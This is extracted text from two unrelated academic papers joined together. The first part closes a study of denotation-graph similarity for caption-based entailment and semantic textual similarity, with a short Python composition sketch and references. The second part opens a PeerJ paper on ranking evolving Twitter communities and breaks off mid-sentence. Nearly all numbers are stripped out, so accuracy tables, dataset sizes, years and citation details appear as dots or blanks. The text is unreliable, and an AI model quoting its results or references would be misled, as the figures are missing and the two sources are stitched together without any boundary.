if someone is eating lunch, it is likely that they are sitting, and people who sit in a classroom are likely to be listening to somebody. these entailments can be very precise: "walk up stair" entails "ascend", but not "descend"; the reverse is true for "walk down stair":

p⟦⟧(x|y)               x = ascend   x = descend
y = walk up stair          .             .
y = walk down stair        .             .

npmi⟦⟧ captures paraphrases as well as closely related events: people look in a mirror when shaving their face, and baseball players may try to tag someone who is sliding into base:

npmi⟦⟧   x                    y
  .      open present         unwrap
  .      lasso                try to rope
  .      get ready to kick    run towards ball
  .      try to tag           slide into base
  .      shave face           look in mirror

comparing the expressions that are most similar to "play baseball" or "play football" according to the denotational npmi⟦⟧ and the compositional Σ similarities reveals that the denotational similarity finds a number of actions that are part of the particular sport, while the compositional similarity finds events that are similar to playing baseball (football):

play baseball
npmi⟦⟧                  Σ
  . tag him               . play softball
  . hold bat              . play game
  . try to tag            . play ball
  . slide into base       . play catch
  . pitch ball            . play cricket

play football
npmi⟦⟧                  Σ
  . tackle person         . play game
  . hold football         . play rugby
  . run down field        . play soccer
  . wear white jersey     . play on field
  . avoid                  . play ball

task : approximate entailment
a caption never provides a complete description of the depicted scene, but commonsense knowledge often allows us to draw implicit inferences: when somebody mentions a bride, it is quite likely that the picture shows a woman in a wedding dress; a picture of a parent most likely also has a child or baby, etc. in order to compare the utility of denotational and distributional similarities for drawing these inferences, we apply them to an approximate entailment task, which is loosely modeled after the recognizing textual entailment problem (dagan et al., ), and consists of deciding whether a brief caption h (the hypothesis) can describe the same image as a set of captions p = {p , ..., pn} known to describe the same image (the premises).

data. we generate positive and negative items 〈p,h,±〉 (figure ) as follows: given an image, any subset of four of its captions forms a set of premises. a hypothesis is either a short verb phrase or sentence that corresponds to a node in the denotation graph. by focusing on short hypotheses, we minimize the possibility that they contain extraneous details that cannot be inferred from the premises. positive examples are generated by choosing a node h as hypothesis and an image i ∈ ⟦h⟧ such that exactly one caption of i generates h and the other four captions of i are not descendants of h and hence do not trivially entail h (which would give an unfair advantage to denotational approaches). negative examples are generated by choosing a node h as hypothesis and selecting four of the captions of an image i ∉ ⟦h⟧.

figure : positive examples from the approximate entailment tasks.
premises:
a woman with dark hair in bending, open mouthed, towards the back of a dark headed toddler's head.
a dark-haired woman has her mouth open and is hugging a little girl while sitting on a red blanket.
a grown lady is snuggling on the couch with a young girl and the lady has a frightened look.
a mom holding her child on a red sofa while they are both having fun.
vp hypothesis: make face

premises:
a man editing a black and white photo at a computer with a pencil in his ear.
a man in a white shirt is working at a computer.
a guy in white t-shirt on a mac computer.
a young main is using an apple computer.
s hypothesis: man sit

since our items are created automatically, a positive hypothesis is not necessarily logically entailed by its premises. we have performed a small-scale human evaluation on items ( positive, negative), each judged independently by the same three judges (inter-annotator agreement: fleiss-κ = . ). our results indicate that over half ( %) of the positive hypotheses can be inferred from their premises alone without looking at the original image, while almost none of the negative hypotheses ( % for sentences, % for verb phrases) can be inferred from their premises. the training items are generated from the captions of , images, and the test items are generated from a disjoint set of , images. the vp data set consists of , training items and , test items, while the s data set consists of , training items and , test items. half of the items in each set are positive, and the other half are negative.

models. all of our models are binary maxent classifiers, trained using mallet (mccallum, ). we have two baseline models: a plain bag-of-words model (bow) and a bag-of-words model where we add all hypernyms in our lexicon to the captions before computing their overlap (bow-h).
this is intended to minimize the advantage the denotational features obtain from the hypernym lexicon used to construct the denotation graph. in both cases, a global bow feature captures the fraction of tokens in the hypothesis that are contained in the premises. word-specific bow features capture the product of the frequencies of each word in h and p. all other models extend the bow-h model.

denotational similarity features. we compute denotational similarities npmi⟦⟧ and p⟦⟧ (section ) over the pairs of nodes in a denotation graph that is restricted to the training images. we only consider pairs of nodes n,n′ if their denotations contain at least images and their intersection contains at least images. to map an item 〈p,h〉 to denotational similarity features, we represent the premises as the set of all nodes p that are ancestors of its captions. a sentential hypothesis is represented as the set of nodes h = {h_s, h_sbj, h_vp, h_v, h_dobj} that correspond to the sentence (h itself), its subject, its vp, its verb and its direct object. a vp hypothesis has only the nodes h = {h_vp, h_v, h_dobj}. in both cases, h_dobj may be empty. both of the denotational similarities npmi⟦⟧(h,p) and p⟦⟧(h|p) for h ∈ h, p ∈ p lead to two constituent-specific features, sum_x and max_x (e.g. sum_sbj = Σ_p sim(h_sbj,p), max_dobj = max_p sim(h_dobj,p)), and two global features sum_p,h = Σ_{p,h} sim(h,p) and max_p,h = max_{p,h} sim(h,p). each constituent type also has a set of node-specific sum_x,s and max_x,s features that are on when constituent x in h is equal to the string s and whose value is equal to the constituent-based feature. for p⟦⟧, each constituent (and each constituent-node pair) has an additional feature p(h|p) = 1 − ∏_n (1 − p⟦⟧(h|p_n)) that estimates the probability that h is generated by some node in the premise.

lexical similarity features. we use two symmetric lexical similarities: standard cosine distance (cos), and lin ( )'s similarity (lin):

cos(w,w′) = (w · w′) / (‖w‖ ‖w′‖)
lin(w,w′) = Σ_{i: w(i)>0 ∧ w′(i)>0} (w(i) + w′(i)) / (Σ_i w(i) + Σ_i w′(i))

we use two directed lexical similarities: clarke ( )'s similarity (clk), and szpektor and dagan ( )'s balanced precision (bal), which builds on lin and on weeds and weir ( )'s similarity (w):

clk(w | w′) = Σ_{i: w(i)>0 ∧ w′(i)>0} min(w(i), w′(i)) / Σ_i w(i)
bal(w | w′) = sqrt( w(w | w′) × lin(w,w′) )
w(w | w′) = Σ_{i: w(i)>0 ∧ w′(i)>0} w(i) / Σ_i w(i)

we also use two publicly available resources that provide precomputed similarities, kotlerman et al. ( )'s direct noun and verb rules and chklovski and pantel ( )'s verbocean rules. both are motivated by the need for numerically quantifiable semantic inferences between predicates. we only use entries that correspond to single tokens (ignoring e.g. phrasal verbs). each lexical similarity results in the following features: each word w in the hypothesis is represented by a max-sim_w feature which captures its maximum similarity with any word in the premises (max-sim_w = max_{w′∈p} sim(w,w′)) and by a sum-sim_w feature which captures the sum of its similarities to the words in the premises (sum-sim_w = Σ_{w′∈p} sim(w,w′)). global max-sim and sum-sim features capture the maximal (resp. total) similarity of any word in the hypothesis to the premise.

we compute distributional and compositional similarities (cos, lin, bal, clk, Σ, Π) on our image captions ("cap"), the bnc and gigaword. for each corpus c, we map each word w that appears at least times in c to a vector wc of the non-negative normalized pointwise mutual information scores (section . )
of w and the , words (excluding stop words) that occur in the most sentences of c. we generally define p(w) (and p(w,w′)) as the fraction of sentences in c in which w (and w′) occur. to allow a direct comparison between distributional and denotational similarities, we first define p(w) (and p(w,w′)) over individual captions ("cap"), and then, to level the playing field, we redefine p(w) (and p(w,w′)) as the fraction of images in whose captions w (and w′) occur ("img"), and then we use our lexicon to augment captions with all hypernyms ("+hyp"). finally, we include bnc and gigaword similarity features ("all").

table : test accuracy on approximate entailment.
                                     vp task        s task
baseline : bow                         .              .
baseline : bow-h                       .              .
external : direct                      .              .
external : verbocean                   .              .
                                    cap    all     cap    all
distributional cos                   .      .       .      .
distributional lin                   .      .       .      .
distributional bal                   .      .       .      .
distributional clk                   .      .       .      .
compositional Π                      .      .       .      .
compositional Σ                      .      .       .      .
compositional Π, Σ                   .      .       .      .
denotational npmi⟦⟧                         .              .
denotational p⟦⟧                            .              .
npmi⟦⟧, p⟦⟧                                 .              .
combined cos, Π, Σ                   .      .       .      .
npmi⟦⟧, p⟦⟧, Π, Σ                    .      .       .      .
npmi⟦⟧, p⟦⟧, cos                     .      .       .      .
npmi⟦⟧, p⟦⟧, cos, Π, Σ               .      .       .      .

compositional similarity features. we use two standard compositional baselines to combine the word vectors of a sentence into a single vector: addition (s_Σ = w1 + ... + wn, which can be interpreted as a disjunctive operation), and element-wise (hadamard) multiplication (s_Π = w1 ⊙ ... ⊙ wn, which can be seen as a conjunctive operation). in both cases, we represent the premises (which consist of four captions) as the sum of each caption's vector, p = p1 + ... + p4. this gives two compositional similarity features: Σ = cos(p_Σ, h_Σ), and Π = cos(p_Π, h_Π).

. experimental results
table provides the test accuracy of our models on the vp and s tasks. adding hypernyms (bow-h) yields a slight improvement over the basic bow model. among the external resources, verbocean is more beneficial than direct, but neither helps as much as in-domain distributional similarities (this may be due to sparsity). table shows only the simplest ("cap") and the most complex ("all") distributional and compositional models, but table provides accuracies of these models as we go from standard sentence-based co-occurrence counts towards more denotation graph-like co-occurrence counts that are based on all captions describing the same image ("img"), include hypernyms ("+hyp"), and add information from other corpora ("all").

table : accuracy on hypotheses as various additions are made to the vector corpora. cap is the image corpus with caption co-occurrence. img is the image corpus with image co-occurrence. +hyp augments the image corpus with hypernyms and uses image co-occurrence. all adds the bnc and gigaword corpora to +hyp.
                       vp task                       s task
                cap   img   +hyp   all        cap   img   +hyp   all
cos              .     .      .     .           .     .      .     .
lin              .     .      .     .           .     .      .     .
bal              .     .      .     .           .     .      .     .
clk              .     .      .     .           .     .      .     .
Π                .     .      .     .           .     .      .     .
Σ                .     .      .     .           .     .      .     .
Π, Σ             .     .      .     .           .     .      .     .
npmi⟦⟧                        .                               .
p⟦⟧                           .                               .
npmi⟦⟧, p⟦⟧                   .                               .

table : accuracy on hypotheses of varying length.
                       vp task              s task
words in h                        +                      +
% of items             .    .    .          .    .    .
bow-h                  .    .    .          .    .    .
cos (all)              .    .    .          .    .    .
Σ (all)                .    .    .          .    .    .
npmi⟦⟧                 .    .    .          .    .    .

the "+hyp" column in table shows that the denotational metrics clearly outperform any distributional metric when both have access to the same information. although the distributional models benefit from the bnc and gigaword-based similarities ("all"), their performance is still below that of the denotational models.
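for concreteness, the additive (Σ) and multiplicative (Π) compositional features used in these comparisons can be sketched as follows; the toy word vectors are hypothetical stand-ins for the pmi-based vectors built from the caption corpus.

import numpy as np

# hypothetical pmi-based word vectors (in the paper these come from
# caption/image co-occurrence counts)
vectors = {
    "man": np.array([0.9, 0.1, 0.0, 0.3]),
    "sit": np.array([0.2, 0.8, 0.1, 0.0]),
    "dog": np.array([0.1, 0.0, 0.9, 0.4]),
    "run": np.array([0.0, 0.2, 0.7, 0.5]),
}

def cos(u, v):
    denom = np.linalg.norm(u) * np.linalg.norm(v)
    return float(u @ v / denom) if denom > 0 else 0.0

def compose(tokens):
    # additive (disjunctive) and element-wise multiplicative (conjunctive)
    # composition of a phrase's word vectors
    vecs = [vectors[t] for t in tokens if t in vectors]
    return np.sum(vecs, axis=0), np.prod(vecs, axis=0)

def sigma_pi_features(premise_sents, hypothesis_tokens):
    # premises are represented as the sum of their composed caption vectors;
    # the two features are cosines between composed premise and hypothesis
    p_sum = np.sum([compose(s)[0] for s in premise_sents], axis=0)
    p_prod = np.sum([compose(s)[1] for s in premise_sents], axis=0)
    h_sum, h_prod = compose(hypothesis_tokens)
    return cos(p_sum, h_sum), cos(p_prod, h_prod)

premises = [["man", "sit"], ["dog", "run"], ["man", "run"], ["dog", "sit"]]
print(sigma_pi_features(premises, ["man", "sit"]))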
among the distributional models, the simple cos performs better than lin or the directed clk and bal similarities. in all cases, giving models access to different similarity features improves performance. table shows the results by hypothesis length. as the length of h increases, classifiers that use similarities between pairs of words (bow-h and cos) continue to improve in performance relative to the classifiers that use similarities between phrases and sentences (Σ and npmi⟦⟧). most likely, this is due to the lexical similarities having a larger set of features to work with for longer h. npmi⟦⟧ does especially well on shorter h, likely due to the shorter h having larger denotations.

task : semantic textual similarity
to assess how the denotational similarities perform on a more established task and domain, we apply them to the sentence pairs from the msr video description corpus (chen and dolan, ) that were annotated for the semeval semantic textual similarity (sts) task (agirre et al., ). the goal of this task is to assign scores between and to a pair of sentences, where indicates equivalence, and unrelatedness. since this is a symmetric task, we do not consider directed similarities. and because the goal of this experiment is not to achieve the best possible performance on this task, but to compare the effectiveness of denotational and more established similarities, we only compare the impact of denotational similarities with compositional similarities computed on our own corpus. since the msr video corpus associates each video with multiple sentences, it is in principle also amenable to a denotational treatment, but the sts task description explicitly forbids its use.

. models
baseline and compositional features. our starting point is bär et al. ( )'s dkpro similarity, one of the top-performing models from the sts shared task, which is available and easily modified. it consists of a log-linear regression model trained on multiple text features (word and character n-grams, longest common substring and longest common subsequence, gabrilovich and markovitch ( )'s explicit semantic analysis, and resnik ( )'s wordnet-based similarity). we investigate the effects of adding compositional (computed on the vectors obtained from the image-caption training data) and denotational similarity features to this state-of-the-art system.

denotational features. since the sts task is symmetric, we only consider npmi⟦⟧ similarities. we again represent each sentence s by features based on types of constituents: s = {s_s, s_sbj, s_vp, s_v, s_dobj}. since sentences might be complex, they might contain multiple constituents of the same type, and we therefore think of each feature as a feature over sets of nodes. for each constituent c we consider two sets of nodes in the denotation graph: c itself (typically leaf nodes), and c_anc, their parents and grandparents. for each pair of sentences, c-c similarities compute the similarity of the constituents of the same type, while c-all similarities compute the similarity of a c constituent in one sentence against all constituents in the other sentence. for each pair of constituents we consider three similarity features: sim(c1, c2), max(sim(c1, c2_anc), sim(c1_anc, c2)), and sim(c1_anc, c2_anc).
the similarity of two sets of nodes is determined by the maximal similarity of any pair of their elements: sim(c1, c2) = max_{x1 ∈ c1, x2 ∈ c2} npmi⟦⟧(x1, x2). this gives us c-c features and c-all features.

. experiments
we use the sts train/test data, normalized in the same way as the image captions for the denotation graph (i.e. we re-tokenize, lemmatize, and remove determiners). table shows experimental results for four models: dkpro is the off-the-shelf dkpro similarity model (bär et al., ). from our corpus, we either add additive and multiplicative compositional features (Σ, Π) from section ("img"), the c-c and c-all denotational features based on npmi⟦⟧, or both compositional and denotational features. systems are evaluated by the pearson correlation (r) of their predicted similarity scores to the human-annotated ones.

table : performance on the sts msrvid task: dkpro (bär et al., ) plus compositional (Σ, Π) and/or denotational similarities (npmi⟦⟧) from our corpus.
              dkpro    +Σ, Π (img)    +npmi⟦⟧    +both
pearson r       .           .             .         .

we see that the denotational similarities outperform the compositional similarities, and that including compositional similarity features in addition to denotational similarity features has little effect. for additional comparison, the published numbers for the takelab semantic text similarity system (šarić et al., ), another top-performing model from the shared task, are r = . on this dataset.

conclusion
summary of contributions. we have defined novel denotational metrics of linguistic similarity (section ), and have shown them to be at least competitive with, if not superior to, distributional similarities for two tasks that require simple semantic inferences (sections , ), even though our current method of computing them is somewhat brittle (section ). we have also introduced two new resources: a large data set of images paired with descriptive captions, and a denotation graph that pairs generalized versions of these captions with their visual denotations, i.e. the sets of images they describe. both of these resources are freely available (http://nlp.cs.illinois.edu/denotation.html). although the aim of this paper is to show their utility for a purely linguistic task, we believe that they should also be of great interest for people who aim to build systems that automatically associate images with sentences that describe them (farhadi et al., ; kulkarni et al., ; li et al., ; yang et al., ; mitchell et al., ; kuznetsova et al., ; gupta et al., ; hodosh et al., ).

related work and resources. we believe that the work reported in this paper has the potential to open up promising new research directions. there are other data sets that pair images or video with descriptive language, but we have not yet applied our approach to them. chen and dolan ( )'s msr video description corpus (of which the sts data is a subset) is most similar to ours, but its curated part is significantly smaller. instead of several independent captions, grubinger et al. ( )'s iapr tc- data set contains longer descriptions. ordonez et al. ( ) harvested million images and their user-generated captions from flickr to create the sbu captioned photo dataset. these captions tend to be less descriptive of the image. the denotation graph is similar to berant et al. ( )'s 'entailment graph', but differs from it in two ways: first, entailment relations in the denotation graph are defined extensionally in terms of the images described by the expressions at each node, and second, nodes in berant et al.'s entailment graph correspond to generic propositional templates (x treats y), whereas nodes in our denotation graph correspond to complete propositions (a dog runs).
acknowledgements
we gratefully acknowledge the support of the national science foundation under nsf awards "int -medium: understanding the meaning of images", "career: bayesian models for lexicalized grammars", and "ci-p: collaborative research: visual entailment data set and challenge for the language and vision community", as well as via an nsf graduate research fellowship to alice lai.

references
eneko agirre, mona diab, daniel cer, and aitor gonzalez-agirre. . semeval- task : a pilot on semantic textual similarity. in proceedings of the first joint conference on lexical and computational semantics - volume : proceedings of the main conference and the shared task, and volume : proceedings of the sixth international workshop on semantic evaluation, semeval ' , pages – .
daniel bär, torsten zesch, and iryna gurevych. . dkpro similarity: an open source framework for text similarity. in proceedings of the st annual meeting of the association for computational linguistics: system demonstrations, pages – , sofia, bulgaria, august.
jon barwise and john perry. . situations and attitudes. journal of philosophy, : – .
jonathan berant, ido dagan, and jacob goldberger. . learning entailment relations by global graph structure optimization. computational linguistics, ( ): – .
greg carlson. . the encyclopedia of language and linguistics, chapter generics, habituals and iteratives. elsevier, nd edition.
david chen and william dolan. . collecting highly parallel data for paraphrase evaluation. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies, pages – , portland, oregon, usa, june.
timothy chklovski and patrick pantel. . verbocean: mining the web for fine-grained semantic verb relations. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , barcelona, spain, july.
kenneth ward church and patrick hanks. . word association norms, mutual information, and lexicography. computational linguistics, ( ): – .
daoud clarke. . context-theoretic semantics for natural language: an overview. in proceedings of the workshop on geometrical models of natural language semantics, pages – , athens, greece, march.
ido dagan, oren glickman, and bernardo magnini. . the pascal recognising textual entailment challenge. in machine learning challenges, volume of lecture notes in computer science, pages – . springer.
david dowty, robert wall, and stanley peters. . introduction to montague semantics. reidel, dordrecht.
ali farhadi, mohsen hejrati, mohammad amin sadeghi, peter young, cyrus rashtchian, julia hockenmaier, and david forsyth. . every picture tells a story: generating sentences from images. in proceedings of the european conference on computer vision (eccv), part iv, pages – , heraklion, greece, september.
evgeniy gabrilovich and shaul markovitch. . computing semantic relatedness using wikipedia-based explicit semantic analysis. in proceedings of the th international joint conference on artificial intelligence, ijcai' , pages – .
michael grubinger, paul clough, henning müller, and thomas deselaers. . the iapr benchmark: a new evaluation resource for visual information systems. in ontoimage , workshop on language resources for content-based image retrieval during lrec , pages – , genoa, italy, may.
ankush gupta, yashaswi verma, and c. jawahar. . choosing linguistics over vision to describe images.
in proceedings of the twenty-sixth aaai conference on artificial intelligence, toronto, ontario, canada, july.
zellig s harris. . distributional structure. word, : – .
micah hodosh, peter young, cyrus rashtchian, and julia hockenmaier. . cross-caption coreference resolution for automatic image understanding. in proceedings of the fourteenth conference on computational natural language learning, pages – , uppsala, sweden, july.
micah hodosh, peter young, and julia hockenmaier. . framing image description as a ranking task: data, models and evaluation metrics. journal of artificial intelligence research (jair), : – .
shangfeng hu and chengfei liu. . incorporating coreference resolution into word sense disambiguation. in alexander f. gelbukh, editor, computational linguistics and intelligent text processing, volume of lecture notes in computer science, pages – . springer berlin heidelberg.
lili kotlerman, ido dagan, idan szpektor, and maayan zhitomirsky-geffet. . directional distributional similarity for lexical inference. natural language engineering, ( ): – .
girish kulkarni, visruth premraj, sagnik dhar, siming li, yejin choi, alexander c. berg, and tamara l. berg. . baby talk: understanding and generating simple image descriptions. in proceedings of the ieee conference on computer vision and pattern recognition (cvpr), pages – .
polina kuznetsova, vicente ordonez, alexander berg, tamara berg, and yejin choi. . collective generation of natural image descriptions. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , jeju island, korea, july.
siming li, girish kulkarni, tamara l. berg, alexander c. berg, and yejin choi. . composing simple image descriptions using web-scale n-grams. in proceedings of the fifteenth conference on computational natural language learning (conll), pages – , portland, or, usa, june.
dekang lin. . an information-theoretic definition of similarity. in proceedings of the fifteenth international conference on machine learning (icml), pages – , madison, wi, usa, july.
bill maccartney and christopher d. manning. . modeling semantic containment and exclusion in natural language inference. in proceedings of the nd international conference on computational linguistics (coling ), pages – , manchester, uk, august.
andrew kachites mccallum. . mallet: a machine learning for language toolkit. http://www.cs.umass.edu/~mccallum/mallet.
shachar mirkin, ido dagan, and eyal shnarch. . evaluating the inferential utility of lexical-semantic resources. in proceedings of the th conference of the european chapter of the acl (eacl ), pages – , athens, greece, march.
jeff mitchell and mirella lapata. . composition in distributional models of semantics. cognitive science, ( ): – .
margaret mitchell, jesse dodge, amit goyal, kota yamaguchi, karl stratos, xufeng han, alyssa mensch, alex berg, tamara berg, and hal daume iii. . midge: generating image descriptions from computer vision detections. in proceedings of the th conference of the european chapter of the association for computational linguistics (eacl), pages – , avignon, france, april.
richard montague. . formal philosophy: papers of richard montague. yale university press, new haven. edited by richmond h. thomason.
joakim nivre, johan hall, and jens nilsson. . maltparser: a data-driven parser-generator for dependency parsing. in proceedings of the international conference on language resources and evaluation (lrec), pages – .
vicente ordonez, girish kulkarni, and tamara l. berg. . im text: describing images using million captioned photographs. in advances in neural information processing systems , pages – .
judita preiss. . anaphora resolution with word sense disambiguation. in proceedings of senseval- second international workshop on evaluating word sense disambiguation systems, pages – , toulouse, france, july.
philip resnik. . using information content to evaluate semantic similarity in a taxonomy. in proceedings of the th international joint conference on artificial intelligence - volume , ijcai' , pages – .
idan szpektor and ido dagan. . learning entailment rules for unary templates. in proceedings of the nd international conference on computational linguistics (coling ), pages – , manchester, uk, august. coling organizing committee.
frane šarić, goran glavaš, mladen karan, jan šnajder, and bojana dalbelo bašić. . takelab: systems for measuring semantic text similarity. in proceedings of the sixth international workshop on semantic evaluation (semeval ), pages – , montréal, canada, - june.
julie weeds and david weir. . a general framework for distributional similarity. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – .
yezhou yang, ching teo, hal daume iii, and yiannis aloimonos. . corpus-guided sentence generation of natural images. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , edinburgh, uk, july.

submitted october accepted january published february corresponding author konstantinos konstantinidis, konkonst@iti.gr academic editor radu marculescu additional information and declarations can be found on page doi . /peerj-cs. copyright konstantinidis et al. distributed under creative commons cc-by . open access

exploring twitter communication dynamics with evolving community analysis
konstantinos konstantinidis, symeon papadopoulos and yiannis kompatsiaris
information technologies institute, centre for research and technology hellas, thessaloniki, greece

abstract
online social networks (osns) have been widely adopted as a means of news dissemination, event reporting, opinion expression and discussion. as a result, news and events are being constantly reported and discussed online through osns such as twitter. however, the variety and scale of all the information renders manual analysis extremely cumbersome, and therefore creating a storyline for an event or news story is an effort-intensive task. the main challenge pertains to the magnitude of data to be analyzed. to this end, we propose a framework for ranking the resulting communities and their metadata on the basis of structural, contextual and evolutionary characteristics such as community centrality, textual entropy, persistence and stability. we apply the proposed framework on three twitter datasets and demonstrate that the analysis that followed enables the extraction of new insights with respect to influential user accounts, topics of discussion and emerging trends. these insights could primarily assist the work of social and political analysis scientists and the work of journalists in their own story telling, but also highlight the limitations of existing analysis methods and pose new research questions. to our knowledge, this study is the first to investigate the ranking of dynamic communities.
in addition, our findings suggest future work regarding the determination of the general context of the communities based on structure and evolutionary behavior alone. subjects data mining and machine learning, network science and online social networks, social computing keywords online social networks, community evolution detection, community ranking, data mining introduction osns have become influential means of disseminating news, reporting events and posting ideas as well as a medium for opinion formation (topirceanu et al., ). such networks combined with advanced statistical tools are often seen as the best sources of real-time information about global phenomena (lazer et al., ; aiello et al., ). numerous studies of osns in relation to a variety of events have been conducted based on data from twitter, a micro-blogging service that allows users to rapidly disseminate and receive information within the limit of characters in a direct, grouped or global manner (williams, terras & warwick, ; nikolov et al., ). twitter is currently one how to cite this article konstantinidis et al. ( ), exploring twitter communication dynamics with evolving community analysis. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:konkonst@iti.gr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. according to company statistics: http://about.twitter.com/company (last accessed on august ). of the largest osn platforms, with million monthly active users and as such the vast amounts of information shared through it cannot be accessed or made use of unless this information is somehow organized. thus, appropriate means of filtering and sorting are necessary to support efficient browsing, influential user discovery, and searching and gaining an overall view of the fluctuating nature of online discussions. existing information browsing facilities, such as simple text queries typically result in immense amounts of posts rendering the inquirer clueless with respect to the online topics of discussion. since online social networks exhibit the property of community structure, one of the more implicit manners of grouping information and thus facilitating the browsing process is by detecting the communities formed within the network. research on community detection on static networks can be found in the lancichinetti & fortunato ( ) survey, as well as in the works of granell et al. ( ), newman ( ), leskovec, lang & mahoney ( ) and papadopoulos et al. ( ). real-world osns, however, are definitely not static. the networks formed in services such as twitter undergo major and rapid changes over time, which places them in the field of dynamic networks (asur, parthasarathy & ucar, ; giatsoglou & vakali, ; palla, barabasi & vicsek, ; takaffoli et al., ; tantipathananandh, berger-wolf & kempe, ; roy chowdhury & sukumar, ; gauvin, panisson & cattuto, ; greene, doyle & cunningham, ; aktunc et al., ; albano, guillaume & le grand, ). these changes are manifested as users join in or leave one or more communities, by friends mentioning each other to attract attention or by new users referencing a total stranger. these trivial interactions seem to have a minor effect on the local structure of a social network. 
however, the network dynamics could lead to a non-trivial transformation of the entire community structure over time, and consequently create a need for reidentification. particularly in osns, the immensely fast and unpredictably fluctuating topological structure of the resulting dynamic networks renders them an extremely complicated and challenging problem. additionally, important questions related to the origin and spread of online messages posted within these networks, as well as the dynamics of interactions among online users and their corresponding communities remain unanswered. to this end, we present a framework for analyzing and ranking the community structure, interaction and evolution in graphs. we also define a set of different evolution scenarios, which our method can successfully identify. a community here is essentially a subgraph which represents a set of interacting users as they tweet and mention one another. the edges of the subgraph represent the mentions made between users. a dynamic community is formed by a temporal array of the aforementioned communities with the condition that they share common users (cazabet & amblard, ; nguyen et al., ). community evolution detection has been previously used to study the temporal structure of a network (gauvin, panisson & cattuto, ; greene, doyle & cunningham, ; palla, barabasi & vicsek, ; takaffoli et al., ). however, even by establishing only the communities that sustain interest over time, the amount of communities and thus metadata that a user has to scan through is immense. in our previous work (konstantinidis, papadopoulos & kompatsiaris, ), we proposed an adaptive approach to discover communities at points in time of increasing interest, but also a size-based varying threshold konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://about.twitter.com/company https://peerj.com http://dx.doi.org/ . /peerj-cs. for use in community evolution detection. both were introduced in an attempt to discard trivial information and to implicitly reduce the available content. although the amount of information was somewhat reduced, the extraction of information still remained a tedious task. hence, to further facilitate the browsing of information that a user has to scan through in order to discover items of interest, we present a sorted version of the data similarly to a search engine. the sorting of the data is performed via the ranking of dynamic communities on the basis of seven distinct features which represent the notions of time, importance, structure, context and integrity (tisci). nonetheless, the sorting of textual information and thus some kind of summarization is only a side-effect of the dynamic community ranking. the main impact lies in the identification and monitoring of persistent, consistent and diverse groups of people who are bound by a specific matter of discussion. the closest work to dynamic community ranking was recently presented by lu & brelsford ( ) in a behavioral analysis case study and as such it is used here as a baseline for comparison purposes. however, it should be mentioned that the ranking was not the primary aim of their research and that the communities were separately sorted by size thus missing the notions of importance, temporal stability and content diversity which are employed in the proposed framework. 
to the best of our knowledge, this is the first time that structural, temporal, importance and contextual features are fused in a dynamic community ranking algorithm for a modern online social network application. although the overall problem is covered by the more general field of evolving network mining, it actually breaks down in many smaller issues that need to be faced. table presents the decomposition of the problem into these issues, together with popular available methods which can be used to overcome them, along with the techniques employed by lu & brelsford ( ) and the ones proposed by the tisci framework which is presented here. in this work, we consider the user activity in the form of mentioning posts, the communities to which the users belong, and most importantly, the evolutionary and significance characteristics of these communities and use them in the ranking process. the proposed analysis is carried out in three steps. in the first step, the twitter api is used to extract mentioning messages that contain interactions between users and a sequence of time periods is determined based on the level of activity. then, for each of these periods, graph snapshots are created based on user interactions and the communities of highly interacting users are extracted using the infomap community detection method (rosvall & bergstrom, ). during the second step, the community evolution detection process inspects whether any communities have persisted in time over a long enough period (eight snapshots). in the last and featured step, the evolution is studied in order to rank the communities and their metadata (i.e., tweeted text, hashtags, urls, etc.) with respect to the communities’ persistence, stability, centrality, size, diversity and integrity characteristics, thus creating dynamic community containers which provide structured access to information. the temporal (evolutional) and contextual features are also the main reason why a static community detection method was employed instead of a dynamic method which konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table deconstruction of the evolving network mining problem. subproblem available methods lu & brelsford ( ) proposed framework event-based time-based granularity selection activity-based event-based time-based louvain infomap community detection modularity optimization infomap infomap jaccard sorensen euclidean set similarity cosine jaccard jaccard reciprocal rank multi-criteria analysis feature fusion condorcet none reciprocal rank fusion size centrality information ranking tisci size tisci would aggregate the information such as the one proposed by nguyen et al. ( ). in order to evaluate the proposed framework it is applied on three datasets extracted from twitter to demonstrate that it can serve as a means of discovering newsworthy pieces of information and real-world incidents around topics of interest. the first dataset was collected by monitoring discussions around tweets containing vocabulary on the season of bbc’s sherlock, the second and third contain discussions on greece’s january and september elections, and the last one containing vocabulary regarding the presidential elections in the us (aiello et al., ). three community detection methods are also employed to demonstrate that infomap is the preferable scheme. 
due to the lack of ground truth datasets for the evaluation of the proposed framework, we devised and are proposing a novel, context-based evaluation scheme which could serve as a basis for future work. it is our belief that by studying the contents of discussions being made in groups and the evolution of these groups we can produce a better understanding of the users’ and communities’ behavior and can give deeper insights into unfolding large-scale events. consequently, our main contributions can be summed up in the following: • a novel ranking framework for dynamic communities based on temporal and contextual features; • a context-based evaluation scheme aimed to overcome the absence of ground truth datasets for the community discovery analysis; • an empirical study on three twitter datasets demonstrating the merits of the proposed framework. an additional asset of the tisci ranking method, which is the main contribution of this paper, is that it was created to work with any kind of community evolution detection konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. method that retains discrete temporal information and that it is independent of the choice of the community detection algorithm applied to the individual timeslots. related work mining osn interactions is a topic that has attracted considerable interest in recent years. interaction analysis provides insights and solutions to a wide range of problems such as cyber-attacks (wei et al., ), recommendation systems (kim & shim, ; gupta et al., ), summarization (schinas et al., ; lin, sundaram & kelliher, ) and information diffusion (yang, mcauley & leskovec, ). one of the most recent attempts comes from mckelvey et al. ( ) who presented the truthy system for collecting and analyzing political discourse on twitter, providing real- time, interactive visualizations of information diffusion processes. they created interfaces containing several key analytical components. these elements include an interactive layout of the communication network shared among the most retweeted users of a meme and detailed user-level metrics on activity volume, sentiment, inferred ideology, language, and communication channel choices. twitinfo is another system that provides network analysis and visualizations of twitter data. its content is collected by automatically identifying ‘‘bursts’’ of tweets (marcus et al., ). after calculating the top tweeted urls in each burst, it plots each tweet on a map, colored according to sentiment. twitinfo focuses on specific memes, identified by the researchers, and is thus limited in cases when 